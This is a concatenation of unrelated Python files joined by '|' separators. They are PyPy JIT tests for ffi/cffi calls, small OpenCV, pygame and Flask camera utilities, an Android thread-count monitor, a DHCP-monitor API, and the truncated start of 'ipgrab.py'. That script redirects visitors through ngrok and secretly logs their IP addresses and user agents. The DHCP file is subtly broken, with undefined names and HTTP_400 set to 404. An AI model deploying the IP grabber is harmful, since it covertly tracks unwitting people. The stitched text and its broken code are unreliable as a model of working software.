import sys, py
from pypy.module.pypyjit.test_pypy_c.test_00_model import BaseTestPyPyC
class Test__ffi(BaseTestPyPyC):
def test__ffi_call(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
from _rawffi.alt import CDLL, types
except ImportError:
sys.stderr.write('SKIP: cannot import _rawffi.alt\n')
return 0
libm = CDLL(libm_name)
pow = libm.getfunc('pow', [types.double, types.double],
types.double)
i = 0
res = 0
while i < 300:
tmp = pow(2, 3) # ID: fficall
res += tmp
i += 1
return pow.getaddr(), res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
pow_addr, res = log.result
assert res == 8.0 * 300
py.test.skip("XXX re-optimize _ffi for the JIT?")
loop, = log.loops_by_filename(self.filepath)
if 'ConstClass(pow)' in repr(loop): # e.g. OS/X
pow_addr = 'ConstClass(pow)'
assert loop.match_by_id('fficall', """
guard_not_invalidated(descr=...)
i17 = force_token()
setfield_gc(p0, i17, descr=<.* .*PyFrame.vable_token .*>)
f21 = call_release_gil(%s, 2.000000, 3.000000, descr=<Callf 8 ff EF=7>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
""" % pow_addr)
def test__ffi_call_frame_does_not_escape(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
from _rawffi.alt import CDLL, types
except ImportError:
sys.stderr.write('SKIP: cannot import _rawffi.alt\n')
return 0
libm = CDLL(libm_name)
pow = libm.getfunc('pow', [types.double, types.double],
types.double)
def mypow(a, b):
return pow(a, b)
i = 0
res = 0
while i < 300:
tmp = mypow(2, 3)
res += tmp
i += 1
return pow.getaddr(), res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
pow_addr, res = log.result
assert res == 8.0 * 300
loop, = log.loops_by_filename(self.filepath)
opnames = log.opnames(loop.allops())
# we only force the virtualref, not its content
assert opnames.count('new_with_vtable') == 1
def test__ffi_call_releases_gil(self):
from rpython.rlib.clibffi import get_libc_name
def main(libc_name, n):
import time
import os
from threading import Thread
#
if os.name == 'nt':
from _rawffi.alt import WinDLL, types
libc = WinDLL('Kernel32.dll')
sleep = libc.getfunc('Sleep', [types.uint], types.uint)
delays = [0]*n + [1000]
else:
from _rawffi.alt import CDLL, types
libc = CDLL(libc_name)
sleep = libc.getfunc('sleep', [types.uint], types.uint)
delays = [0]*n + [1]
#
def loop_of_sleeps(i, delays):
for delay in delays:
sleep(delay) # ID: sleep
#
threads = [Thread(target=loop_of_sleeps, args=[i, delays]) for i in range(5)]
start = time.time()
for i, thread in enumerate(threads):
thread.start()
for thread in threads:
thread.join()
end = time.time()
return end - start
log = self.run(main, [get_libc_name(), 200], threshold=150,
import_site=True)
assert 1 <= log.result <= 1.5 # at most 0.5 seconds of overhead
loops = log.loops_by_id('sleep')
assert len(loops) == 1 # make sure that we actually JITted the loop
def test__ffi_struct(self):
def main():
from _rawffi.alt import _StructDescr, Field, types
fields = [
Field('x', types.slong),
]
descr = _StructDescr('foo', fields)
struct = descr.allocate()
i = 0
while i < 300:
x = struct.getfield('x') # ID: getfield
x = x+1
struct.setfield('x', x) # ID: setfield
i += 1
return struct.getfield('x')
#
log = self.run(main, [])
py.test.skip("XXX re-optimize _ffi for the JIT?")
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('getfield', """
guard_not_invalidated(descr=...)
i57 = getfield_raw_i(i46, descr=<FieldS dynamic 0>)
""")
assert loop.match_by_id('setfield', """
setfield_raw(i44, i57, descr=<FieldS dynamic 0>)
""")
def test__cffi_call(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libm = _cffi_backend.load_library(libm_name)
BDouble = _cffi_backend.new_primitive_type("double")
BInt = _cffi_backend.new_primitive_type("int")
BPow = _cffi_backend.new_function_type([BDouble, BInt], BDouble)
ldexp = libm.load_function(BPow, 'ldexp')
i = 0
res = 0
while i < 300:
tmp = ldexp(1, 3) # ID: cfficall
res += tmp
i += 1
BLong = _cffi_backend.new_primitive_type("long")
ldexp_addr = int(_cffi_backend.cast(BLong, ldexp))
return ldexp_addr, res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
ldexp_addr, res = log.result
assert res == 8.0 * 300
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
f97 = call_release_gil_f(91, i59, 1.0, 3, descr=<Callf 8 fi EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
""", ignore_ops=['guard_not_invalidated'])
def test__cffi_call_c_int(self):
if sys.platform == 'win32':
py.test.skip("not tested on Windows (this test must pass on "
"other platforms, and it should work the same way)")
def main():
import os
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libc = _cffi_backend.load_library(None)
BInt = _cffi_backend.new_primitive_type("int")
BClose = _cffi_backend.new_function_type([BInt], BInt)
_dup = libc.load_function(BClose, 'dup')
i = 0
fd0, fd1 = os.pipe()
while i < 300:
tmp = _dup(fd0) # ID: cfficall
os.close(tmp)
i += 1
os.close(fd0)
os.close(fd1)
BLong = _cffi_backend.new_primitive_type("long")
return 42
#
log = self.run(main, [])
assert log.result == 42
loop, = log.loops_by_filename(self.filepath)
if sys.maxint > 2**32:
extra = "i98 = int_signext(i97, 4)"
else:
extra = ""
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
i97 = call_release_gil_i(91, i59, i50, descr=<Calli 4 i EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
%s
""" % extra, ignore_ops=['guard_not_invalidated'])
def test__cffi_call_size_t(self):
if sys.platform == 'win32':
py.test.skip("not tested on Windows (this test must pass on "
"other platforms, and it should work the same way)")
def main():
import os
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libc = _cffi_backend.load_library(None)
BInt = _cffi_backend.new_primitive_type("int")
BSizeT = _cffi_backend.new_primitive_type("size_t")
BChar = _cffi_backend.new_primitive_type("char")
BCharP = _cffi_backend.new_pointer_type(BChar)
BWrite = _cffi_backend.new_function_type([BInt, BCharP, BSizeT],
BSizeT) # not signed here!
_write = libc.load_function(BWrite, 'write')
i = 0
fd0, fd1 = os.pipe()
buffer = _cffi_backend.newp(BCharP, 'A')
while i < 300:
tmp = _write(fd1, buffer, 1) # ID: cfficall
assert tmp == 1
assert os.read(fd0, 2) == 'A'
i += 1
os.close(fd0)
os.close(fd1)
return 42
#
log = self.run(main, [])
assert log.result == 42
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
i97 = call_release_gil_i(91, i59, i10, i12, 1, descr=<Calli . iii EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
p98 = call_r(ConstClass(fromrarith_int__r_uint), i97, descr=<Callr . i EF=4>)
guard_no_exception(descr=...)
""", ignore_ops=['guard_not_invalidated'])
def test_cffi_call_guard_not_forced_fails(self):
# this is the test_pypy_c equivalent of
# rpython/jit/metainterp/test/test_fficall::test_guard_not_forced_fails
#
# it requires cffi to be installed for pypy in order to run
def main():
import sys
try:
import cffi
except ImportError:
sys.stderr.write('SKIP: cannot import cffi\n')
return 0
ffi = cffi.FFI()
ffi.cdef("""
typedef void (*functype)(int);
int foo(int n, functype func);
""")
lib = ffi.verify("""
#include <signal.h>
typedef void (*functype)(int);
int foo(int n, functype func) {
if (n >= 2000) {
func(n);
}
return n*2;
}
""")
@ffi.callback("functype")
def mycallback(n):
if n < 5000:
return
# make sure that guard_not_forced fails
d = {}
f = sys._getframe()
while f:
d.update(f.f_locals)
f = f.f_back
n = 0
while n < 10000:
res = lib.foo(n, mycallback) # ID: cfficall
# this is the real point of the test: before the
# refactor-call_release_gil branch, the assert failed when
# res == 5000
assert res == n*2
n += 1
return n
log = self.run(main, [], import_site=True,
discard_stdout_before_last_line=True) # <- for Win32
assert log.result == 10000
loop, = log.loops_by_id('cfficall')
assert loop.match_by_id('cfficall', """
...
i1 = call_release_gil_i(..., descr=<Calli 4 ii EF=7 OS=62>)
...
""")
def test__cffi_bug1(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libm = _cffi_backend.load_library(libm_name)
BDouble = _cffi_backend.new_primitive_type("double")
BSin = _cffi_backend.new_function_type([BDouble], BDouble)
sin = libm.load_function(BSin, 'sin')
def f(*args):
for i in range(300):
sin(*args)
f(1.0)
f(1)
#
libm_name = get_libm_name(sys.platform)
self.run(main, [libm_name])
# assert did not crash
def test_cffi_init_struct_with_list(self):
def main(n):
import sys
try:
import cffi
except ImportError:
sys.stderr.write('SKIP: cannot import cffi\n')
return 0
ffi = cffi.FFI()
ffi.cdef("""
struct s {
short x;
short y;
short z;
};
""")
for i in xrange(n):
ffi.new("struct s *", [i, i, i])
log = self.run(main, [300])
loop, = log.loops_by_filename(self.filepath)
assert loop.match("""
i106 = getfield_gc_i(p20, descr=...)
i161 = int_lt(i106, i43)
guard_true(i161, descr=...)
i162 = int_add(i106, 1)
p110 = getfield_gc_r(p16, descr=...)
setfield_gc(p20, i162, descr=...)
guard_value(p110, ConstPtr(ptr111), descr=...)
guard_not_invalidated(descr=...)
p163 = force_token()
p164 = force_token()
p118 = getfield_gc_r(p16, descr=...)
p120 = getarrayitem_gc_r(p118, 0, descr=...)
guard_value(p120, ConstPtr(ptr121), descr=...)
p122 = getfield_gc_r(p120, descr=...)
guard_value(p122, ConstPtr(ptr123), descr=...)
p125 = getfield_gc_r(p16, descr=...)
guard_nonnull_class(p125, ..., descr=...)
p127 = getfield_gc_r(p125, descr=...)
guard_value(p127, ConstPtr(ptr128), descr=...)
p129 = getfield_gc_r(p127, descr=...)
guard_value(p129, ConstPtr(ptr130), descr=...)
p132 = call_r(ConstClass(_ll_0_alloc_with_del___), descr=...)
guard_no_exception(descr=...)
p133 = force_token()
p134 = new_with_vtable(descr=...)
setfield_gc(p134, ..., descr=...)
setfield_gc(p134, ConstPtr(null), descr=...)
setfield_gc(p48, p134, descr=...)
setfield_gc(p132, ..., descr=...)
i138 = call_i(ConstClass(_ll_1_raw_malloc_varsize_zero__Signed), 6, descr=...)
check_memory_error(i138)
setfield_gc(p132, i138, descr=...)
setfield_gc(p132, ConstPtr(ptr139), descr=...)
setfield_gc(p132, -1, descr=...)
setfield_gc(p0, p133, descr=...)
call_may_force_n(ConstClass(_ll_2_gc_add_memory_pressure__Signed_pypy_module__cffi_backend_cdataobj_W_CDataNewStdPtr), 6, p132, descr=...)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
i144 = int_add(i138, 0)
i146 = int_signext(i106, 2)
i147 = int_ne(i106, i146)
guard_false(i147, descr=...)
setarrayitem_raw(i144, 0, i106, descr=...)
i150 = int_add(i138, 2)
setarrayitem_raw(i150, 0, i106, descr=...)
i153 = int_add(i138, 4)
setarrayitem_raw(i153, 0, i106, descr=...)
p156 = getfield_gc_r(p48, descr=...)
i158 = getfield_raw_i(..., descr=...)
setfield_gc(p48, p49, descr=...)
setfield_gc(p134, ConstPtr(null), descr=...)
i160 = int_lt(i158, 0)
guard_false(i160, descr=...)
jump(..., descr=...)
""")
|
Ports.py
|
import pygame
from PIL import Image
import time
import MotherBoard.util as util
from threading import Thread
buffer = Image.new("RGB",(16,16),"black")
running = True
ports = {0:0, 1:0, 2:0, 3:0, 4:0, 5:0, 6:0, 7:0, 8:0, 9:0, 10:0, 11:0, 12:0, 13:0, 14:0, 15:0}
def screen():
global buffer
global running
pygame.init()
screen = pygame.display.set_mode((640,640))
clock = pygame.time.Clock()
while running:
#clock.tick(10)
for x in xrange(16):
# print RAM[x],ram.read(RAM[x])
q = util.mybin(ports[x])
for y in xrange(16):
buffer.putpixel((y, x), (255 * int(q[y]), 255 * int(q[y]), 255 * int(q[y])))
t = buffer.resize((640,640)).tobytes()
img=pygame.image.frombuffer(t,(640,640),"RGB")
screen.blit(img,(0,0))
pygame.display.flip()
for e in pygame.event.get():
if e.type == pygame.QUIT:
running = False
class Ports:
def __init__(self):
self.TickTime = 0
self.currentTick = 0
self.screenThread = Thread(target=screen)
self.screenThread.start()
print("Initalizing pygame.")
time.sleep(1)
def tick(self, port, prom):
global ports
ports = port
if running == False:
quit()
def CleanUp(self):
pass
|
thread.py
|
import cv2
import threading
import queue
class ThreadingClass:
def __init__(self, name):
self.cap = cv2.VideoCapture(name)
self.q = queue.Queue()
t = threading.Thread(target = self._reader)
t.daemon = True
t.start()
def _reader(self):
while True:
ret, frame = self.cap.read()
if not ret:
break
if not self.q.empty():
try:
self.q.get_nowait()
except queue.Empty:
pass
self.q.put(frame)
def read(self):
return self.q.get()
def release(self):
return self.cap.release()
|
thread_num.py
|
#encoding:utf-8
'''
@author: look
@copyright: 1999-2020 Alibaba.com. All rights reserved.
@license: Apache Software License 2.0
@contact: 390125133@qq.com
'''
import csv
import os
import re
import sys
import threading
import time
import traceback
BaseDir=os.path.dirname(__file__)
sys.path.append(os.path.join(BaseDir,'../..'))
from mobileperf.android.tools.androiddevice import AndroidDevice
from mobileperf.common.utils import TimeUtils
from mobileperf.common.log import logger
from mobileperf.android.globaldata import RuntimeData
class ThreadNumPackageCollector(object):
def __init__(self, device, pacakgename, interval=1.0,timeout =24 * 60 * 60, thread_queue = None):
self.device = device
self.packagename = pacakgename
self._interval = interval
self._timeout = timeout
self._stop_event = threading.Event()
self.thread_queue = thread_queue
def start(self,start_time):
logger.debug("INFO: ThreadNum PackageCollector start... ")
self.collect_thread_num_thread = threading.Thread(target=self._collect_thread_num_thread, args=(start_time,))
self.collect_thread_num_thread.start()
def stop(self):
logger.debug("INFO: ThreadNumPackageCollector stop... ")
if (self.collect_thread_num_thread.isAlive()):
self._stop_event.set()
self.collect_thread_num_thread.join(timeout=1)
self.collect_thread_num_thread = None
#结束的时候,发送一个任务完成的信号,以结束队列
if self.thread_queue:
self.thread_queue.task_done()
def get_process_thread_num(self, process):
pid = self.device.adb.get_pid_from_pck(self.packagename)
out = self.device.adb.run_shell_cmd('ls -lt /proc/%s/task' % pid)
collection_time = time.time()
logger.debug("collection time in thread_num info is : " + str(collection_time))
if out:
# logger.debug("thread num out:"+out)
thread_num = len(out.split("\n"))
return [collection_time,self.packagename,pid,thread_num]
else:
return []
def _collect_thread_num_thread(self, start_time):
end_time = time.time() + self._timeout
thread_list_titile = (
"datatime", "packagename", "pid", "thread_num")
thread_num_file = os.path.join(RuntimeData.package_save_path, 'thread_num.csv')
try:
with open(thread_num_file, 'a+') as df:
csv.writer(df, lineterminator='\n').writerow(thread_list_titile)
if self.thread_queue:
thread_file_dic = {'thread_file': thread_num_file}
self.thread_queue.put(thread_file_dic)
except RuntimeError as e:
logger.error(e)
while not self._stop_event.is_set() and time.time() < end_time:
try:
before = time.time()
logger.debug("-----------into _collect_thread_num_thread loop, thread is : " + str(threading.current_thread().name))
# 获取pakagename的thread num信息
thread_pck_info = self.get_process_thread_num(self.packagename)
logger.debug(thread_pck_info)
current_time = TimeUtils.getCurrentTime()
if not thread_pck_info:
continue
else:
logger.debug(
"current time: " + current_time + ", processname: " + thread_pck_info[1]+ ", pid: " + str(thread_pck_info[2]) +
" thread num: " + str(thread_pck_info[3]))
if self.thread_queue:
self.thread_queue.put(thread_pck_info)
if not self.thread_queue:#为了本地单个文件运行
try:
with open(thread_num_file, 'a+',encoding="utf-8") as thread_writer:
writer_p = csv.writer(thread_writer, lineterminator='\n')
thread_pck_info[0] = current_time
writer_p.writerow(thread_pck_info)
except RuntimeError as e:
logger.error(e)
after = time.time()
time_consume = after - before
delta_inter = self._interval - time_consume
logger.debug("time_consume for thread num infos: " + str(time_consume))
if delta_inter > 0:
time.sleep(delta_inter)
except:
logger.error("an exception hanpend in thread num thread, reason unkown!")
s = traceback.format_exc()
logger.debug(s)
if self.thread_queue:
self.thread_queue.task_done()
class ThreadNumMonitor(object):
def __init__(self, device_id, packagename, interval = 1.0, timeout=24*60*60,thread_queue = None):
self.device = AndroidDevice(device_id)
if not packagename:
packagename = self.device.adb.get_foreground_process()
self.thread_package_collector = ThreadNumPackageCollector(self.device, packagename, interval, timeout,thread_queue)
def start(self,start_time):
self.start_time = start_time
self.thread_package_collector.start(start_time)
def stop(self):
self.thread_package_collector.stop()
def save(self):
pass
if __name__ == "__main__":
monitor = ThreadNumMonitor("","com.yunos.tv.alitvasr",3)
monitor.start(TimeUtils.getCurrentTime())
time.sleep(20)
monitor.stop()
# monitor.save()
|
web.py
|
from inspect import currentframe
from flask import Flask, render_template, Response
#!/usr/bin/env python3
import re
import cv2
import depthai as dai
import numpy as np
from multiprocessing.pool import ThreadPool
import threading
from queue import Queue
from collections import deque
import time
import base64
from flask_socketio import SocketIO, emit
app = Flask(__name__)
socketio = SocketIO(app)
# Create pipeline
pipeline = dai.Pipeline()
# Define source and output
camRgb = pipeline.createColorCamera()
xoutRgb = pipeline.createXLinkOut()
xoutRgb.setStreamName("rgb")
# Properties
camRgb.setPreviewSize(1920, 1080)
camRgb.setInterleaved(False)
camRgb.setColorOrder(dai.ColorCameraProperties.ColorOrder.RGB)
# Linking
camRgb.preview.link(xoutRgb.input)
global first_iter
global points
global currFrame
global final
threadn = cv2.getNumberOfCPUs()
pool = ThreadPool(processes = threadn)
pending = deque()
video = deque()
class Filter():
def procs(frame):
hsv = pool.apply_async(Filter.hsv, (frame,))
pending.append(hsv)
hsv = pending.popleft().get()
# Threshold the HSV image to get only white colors
mask = pool.apply_async(Filter.mask, (hsv,))
pending.append(mask)
mask = pending.popleft().get()
# Bitwise-AND mask and original image
res = cv2.bitwise_and(frame,frame, mask= mask)
contours = pool.apply_async(Filter.contours, (mask,))
pending.append(contours)
contours = pending.popleft().get()
#sorting the contour based of area
tracked = frame.copy()
return tracked, res
def hsv(frame):
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
return hsv
def mask(hsv):
lower_white = np.array([2, 48, 125], dtype=np.uint8)
upper_white = np.array([81, 255, 255], dtype=np.uint8)
mask = cv2.inRange(hsv, lower_white, upper_white)
return mask
def contours(mask):
contours, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
contours = sorted(contours, key=cv2.contourArea, reverse=True)
return contours
class Display():
def videoStream(name, frame):
cv2.imshow(name, frame)
# cv2.imshow(name, video.get(block=False))
def main():
# used to record the time when we processed last frame
prev_frame_time = 0
# used to record the time at which we processed current frame
new_frame_time = 0
avgFPS = 1
framerate = []
threadn = cv2.getNumberOfCPUs()
pool = ThreadPool(processes = threadn)
process = deque()
# Connect to device and start pipeline
with dai.Device(pipeline) as device:
print('Connected cameras: ', device.getConnectedCameras())
# Print out usb speed
print('Usb speed: ', device.getUsbSpeed().name)
qRgb = device.getOutputQueue(name="rgb", maxSize=4, blocking=False)
print(np.shape(qRgb))
frame = None
first_iter = True
points = []
while True:
while len(process) > 0 and process[0].ready():
tracked, res = process.popleft().get()
if res is not None:
new_frame_time = time.time()
fps = 1/(new_frame_time-prev_frame_time)
prev_frame_time = new_frame_time
fps = int(fps)
framerate.insert(0, fps)
avgFPS = str(int(sum(framerate)/len(framerate))+1)
if len(framerate) > 10:
del framerate[len(framerate)-1]
print(avgFPS)
# if (1/(new_frame_time-prev_frame_time) > 120):
# # video.put(res)
# stream = threading.Thread(target=Display.videoStream, args=("video", res))
# stream.start()
cv2.putText(res, avgFPS, (7, 70), cv2.FONT_HERSHEY_SIMPLEX, 2, (100, 200, 100), 2, cv2.LINE_AA)
cv2.putText(tracked, avgFPS, (7, 70), cv2.FONT_HERSHEY_SIMPLEX, 2, (100, 200, 100), 2, cv2.LINE_AA)
cv2.imshow('threaded video', tracked)
cv2.imshow('threaded mask', res)
# stream = pool.apply_async(Display.videoStream, ("threaded video", res))
# video.append(stream)
# # stream = process.popleft().get()
currFrame = res
if len(process) < threadn:
inRgb = qRgb.tryGet()
if inRgb is not None:
frame = inRgb.getCvFrame()
if frame is not None:
frame = frame
if (int(avgFPS) < 60):
task = pool.apply_async(Filter.procs, (frame,))
process.append(task)
key = cv2.waitKey(1)
if key == ord('q'):
break
# @app.route('/video_feed')
# def video_feed():
# #Video streaming route. Put this in the src attribute of an img tag
# return Response(main(), mimetype='multipart/x-mixed-replace; boundary=frame')
@socketio.on("request-frame", namespace="/camera-feed")
def camera_frame_requested(message):
frame = currFrame
if frame is not None:
emit("new-frame", {
"base64": base64.b64encode(frame).decode("ascii")
})
@app.route('/')
def index():
"""Video streaming home page."""
return render_template('index.html')
if __name__ == "__main__":
# app.run(debug=True)
socketio.run(app, host="0.0.0.0", port=8080, threaded=True)
# main()
# cv2.destroyAllWindows()
|
endpoints.py
|
import os
import sys
import json
from flask import request, Blueprint, Response
from flask_cors import cross_origin
from concurrent.futures import ThreadPoolExecutor
from multiprocessing import Process
from dhcp_monitor.command_scripts.stream_handler import StreamHandler
from dhcp_monitor.data_manipulation.dump_message_handler import DataHandler
from dhcp_monitor.command_scripts.log_handler import LogHandler
from config import KEA_LOGPATH, DUMP_PATH, DUMP_INTERFACE, REQUIRE_API_AUTHENTICATION
from utils import MONITOR_LOGGER, check_path
MONITOR_BP = Blueprint('dhcp_monitor', __name__, url_prefix='/monitor')
SERVICE_CODE = "000"
STATUS_OK = "OK"
STATUS_KO = "KO"
HTTP_200 = 200 # Success
HTTP_400 = 404 # Bad request
HTTP_401 = 401 # None or bad credentials sent
HTTP_500 = 500 # General internal server error
SUCCESS_1000 = "1000"
SUCCESS_1000_VALUE = "Command execution successful"
ERROR_4000 = "4000"
ERROR_4000_VALUE = "Exception occured in the server. Command unsuccessful"
ERROR_4001 = "4001"
ERROR_4001_VALUE = "Could not find JSON key"
PACKET_CAPTURE_PID_FILE = 'packet_monitor.pid'
stream_instance = StreamHandler(dump_path=DUMP_PATH, dump_if=DUMP_INTERFACE)
log_handler_instance = LogHandler(logfile=KEA_LOGPATH)
log_map_handler = DataHandler(log_handler_instance)
data_handler = DataHandler(stream_instance)
# Check for API keys if REQUIRE_API_AUTHENTICATION is enabled in
if REQUIRE_API_AUTHENTICATION:
GET_AUTH_TOKEN_API = '111'
ERROR_5000 = "5000"
ERROR_5000_VALUE = "Invalid request"
ERROR_5001 = "5001"
ERROR_5001_VALUE = "Could not find API key in request"
ERROR_5002 = "5002"
ERROR_5002_VALUE = "Incorrect API key"
# This function will be called every time a request is received. In case
# the request is a GET, then apikey is extracted from the GET request and
# checked for validity. Other requests are handled similarly.
@BP.before_request
def check_auth():
print("DEBUG: request.endpoint = " + str(request.endpoint))
LOGGER.debug("request.endpoint = " + str(request.endpoint))
if request.endpoint == "dhcp4.home":
return
# If request method is POST
if request.method == 'POST':
print("DEBUG: request is POST")
LOGGER.debug("DEBUG: request is POST")
# Extract POST data, look for API key and handle verification
json_req_data = request.get_json()
# If no JSON POST request data is found, then return error
if not json_req_data:
LOGGER.info("Error - No JSON data")
print("Error - No JSON data")
response = response_generator(
STATUS_KO,
HTTP_400,
SERVICE_CODE + CHECK_AUTH_API + ERROR_5000,
ERROR_5000_VALUE,
{'error': ERROR_5000_VALUE})
LOGGER.error("JSON ERROR - > %s", ERROR_5000_VALUE)
return response
# If JSON POST request data is found, then ...
else:
# If API key is found in JSON data then ...
if "apikey" in json_req_data:
apikey = json_req_data['apikey']
print("DEBUG: apikey = " + str(apikey))
verify_value = verify_api_key(apikey)
print("DEBUG: verify_value = " + str(verify_value))
# If API key is incorrect, send an error back
if verify_value == False:
LOGGER.error("JSON ERROR - > %s", ERROR_5000_VALUE)
return return_incorrect_api_key()
else:
print("DEBUG: Could not find API key in request")
LOGGER.error("JSON ERROR - > %s", ERROR_5001_VALUE)
return return_no_api_key_found()
if request.method == 'GET':
print("DEBUG: request is GET")
# Extract GET arguments, look for API key and handle verification
api_key = request.args.get('apikey')
print("DEBUG: api_key = " + str(api_key))
LOGGER.debug("DEBUG: api_key = " + str(api_key))
# If no apikey is found then return error
if api_key is None:
return return_no_api_key_found()
else:
print("DEBUG: api_key = " + str(api_key))
LOGGER.debug("DEBUG: api_key = " + str(api_key))
verify_value = verify_api_key(api_key)
print("DEBUG: check_auth(): verify_value = " +
str(verify_value))
LOGGER.debug("DEBUG: check_auth(): verify_value = " +
str(verify_value))
if verify_value == False:
print("DEBUG: check_auth(): returning incorrect api key \
response")
LOGGER.debug("DEBUG: check_auth(): returning incorrect \
api key response")
return return_incorrect_api_key()
# Implement other methods here
def return_no_api_key_found():
response = response_generator(STATUS_KO, HTTP_400,
SERVICE_CODE + CHECK_AUTH_API + ERROR_5001,
ERROR_5001_VALUE, {'error': ERROR_5001_VALUE})
return response
def return_incorrect_api_key():
response = response_generator(STATUS_KO, HTTP_401,
SERVICE_CODE + CHECK_AUTH_API + ERROR_5002, ERROR_5002_VALUE,
{'error': ERROR_5002_VALUE})
return response
def start_threads():
try:
with ThreadPoolExecutor(max_workers=min(32, os.cpu_count() + 4), thread_name_prefix='pooler') as executor:
MONITOR_LOGGER.info("Starting log map handler")
executor.submit(fn=log_map_handler.print_tail)
MONITOR_LOGGER.info("Starting data handler")
executor.submit(fn=data_handler.create_dataframe)
MONITOR_LOGGER.info("Done")
return {'data': 'success', 'triggered': check_trigger_status()}
except Exception as excp:
return {'error': repr(excp), 'triggered': check_trigger_status()}
def check_trigger_status():
return check_path(PACKET_CAPTURE_PID_FILE)
@MONITOR_BP.route('/status', methods=['GET'])
@cross_origin()
def status():
try:
return {'triggered': check_trigger_status()}
except Exception as excp:
return {'error': repr(excp), 'triggered': check_trigger_status()}
@MONITOR_BP.route('/', methods=['GET'])
@cross_origin()
def home():
try:
return {'data': 'DHCP Monitor up.', 'triggered': check_trigger_status()}
except Exception as excp:
return {'error': repr(excp), 'triggered': check_trigger_status()}
@MONITOR_BP.route('/get_rows', methods=['POST'])
@cross_origin()
def rows():
try:
req = request.get_json()
data = data_handler.get_rows(int(req['offset']), int(req['count']))
return data
except Exception as excp:
return {'error': repr(excp), 'triggered': check_trigger_status()}
@MONITOR_BP.route('/trigger', methods=['GET'])
@cross_origin()
def trigger():
try:
if check_trigger_status():
return {'triggered': check_trigger_status()}
data_handler.reset_dump_collection_file()
MONITOR_LOGGER.info("Starting log map handler")
dump_process = Process(target=start_threads)
dump_process.start()
with open(PACKET_CAPTURE_PID_FILE, 'w') as file:
MONITOR_LOGGER.info('Writing to file - DUMP Process PID -> %s', dump_process.pid)
file.write(str(dump_process.pid))
MONITOR_LOGGER.info("Starting data handler")
return {'data': 'success', 'triggered': check_trigger_status()}
except Exception as excp:
return {'error': repr(excp), 'triggered': check_trigger_status()}
@MONITOR_BP.route('/terminate', methods=['GET'])
@cross_origin()
def terminate():
print('hi')
MONITOR_LOGGER.info("Getting global variable")
try:
MONITOR_LOGGER.info("Stopping now")
if check_trigger_status():
MONITOR_LOGGER.info("Trigger found")
with open(PACKET_CAPTURE_PID_FILE) as file:
pid = file.read()
MONITOR_LOGGER.info('DUMP Process PID from FILE -> %s', pid)
os.kill(int(pid), 9)
os.remove(PACKET_CAPTURE_PID_FILE)
MONITOR_LOGGER.info("Dump terminated")
else:
MONITOR_LOGGER.info("No Trigger found")
return {'data': 'success', 'triggered': check_trigger_status()}
except Exception as excp:
return {'error': repr(excp), 'triggered': check_trigger_status()}
@MONITOR_BP.route('/row_count', methods=['GET'])
@cross_origin()
def row_count():
try:
MONITOR_LOGGER.debug("Getting row count")
data = data_handler.row_count()
if isinstance(data, int):
return {'data': data, 'triggered': check_trigger_status()}
else:
return {'error': data, 'triggered': check_trigger_status()}
except Exception as excp:
return {'error': repr(excp), 'triggered': check_trigger_status()}
def response_generator(status, http_code, output_code, output_value, data):
""" Response formatted to suit fast core """
MONITOR_LOGGER.info('Executing')
return_value = {
"status": status,
'statusCode': output_code,
'statusValue': output_value,
'data': data
}
json_return_value = json.dumps(return_value)
MONITOR_LOGGER.info("json_return_value = %s", str(json_return_value))
response = Response(json_return_value, status=http_code,
mimetype='application/json')
MONITOR_LOGGER.info('Returning %s', str(return_value))
return response
|
ipgrab.py
|
# By Luiz Viana
import argparse
from http.server import HTTPServer, BaseHTTPRequestHandler
import time
import os
import requests
from threading import Thread
import platform
parser = argparse.ArgumentParser(description="IP grabber NGROK")
parser.add_argument('-u', '--redirect-url', type=str, required=True, help="URL to redirect")
parser.add_argument('-p', '--port', type=int, default=8181, help="HTTP Server port")
parser.add_argument('-n', '--ngrok-path', type=str, default='ngrok', help="NGROK path")
parser.add_argument('-o', '--output-file', type=str, help="output file path")
args = parser.parse_args()
save = 0 # count connections
iplist = [] # IP log
def redirect():
class Redirect(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header('Location', args.redirect_url)
self.end_headers()
def log_message(self, format, *args):
return
HTTPServer(("", int(args.port)), Redirect).serve_forever()
def logip():
global iplist
c = 0
r = requests.get('http://localhost:4040/api/requests/http').json()
if args.output_file:
log = open(args.output_file, "a+")
for i in r['requests']:
if r['requests'][c]['request']['headers']['X-Forwarded-For'][0] not in iplist:
ip = r['requests'][c]['request']['headers']['X-Forwarded-For'][0]
iplist.append(ip)
useragent = r['requests'][c]['request']['headers']['User-Agent'][0]
date = r['requests'][c]['start']
info = "[ + ] REQUEST ID: {}\n[ + ] Date: {}\n[ + ] IP ADDRESS: {}\n[ + ] User Agent: {}".format(
iplist.index(ip),
